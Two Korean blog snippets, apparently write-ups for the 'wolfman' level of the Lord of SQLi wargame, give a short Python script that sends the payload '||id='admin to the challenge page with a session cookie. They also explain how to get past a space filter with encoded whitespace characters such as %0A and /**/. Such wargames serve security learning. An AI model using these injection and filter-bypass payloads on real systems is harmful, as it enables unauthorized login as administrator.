LOS :: 5번 WOLFMAN WRITE UP 1234567891011import requests url = "http://los.rubiya.kr/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php"session = {'PHPSESSID':'MY_SESSION'}data = {'pw':"'||id='admin"} res = requests.get(url, params=data, cookies = session) if "Clear!" in res.text: print("[♪] WOLFMAN Clear!") Colored by Color Scriptercs Wargame/LOS(rubiya) 7년 전
[LOS]5번 wolfman 울프맨을 따라가보자 id=guest가 고정이고 pw를 사용해야한다. admin계정이 필요하니 ?pw=a' or id='admin 라고 입력했더니 아래와같이 나왔다 공백을 사용할수 없는것 같다 소스를 봐도 공백이 필터링되어있음을 알 수 있다. 그렇다면 공백필터링을 우회해야 한다. 수평탭(%09) 라인피드(%0A) 수직탭(%0B) 폼피드(%0C) 캐리지리턴(%0D) 주석(/**/) 라인피드(LF)를 사용해보자 라인피드는 아스키코드 16진수 0A이므로 이를 이용하면 아래와 같이 문제를 풀어낼 수 있다. Wargame/LOS(eagle-jump) 8년 전
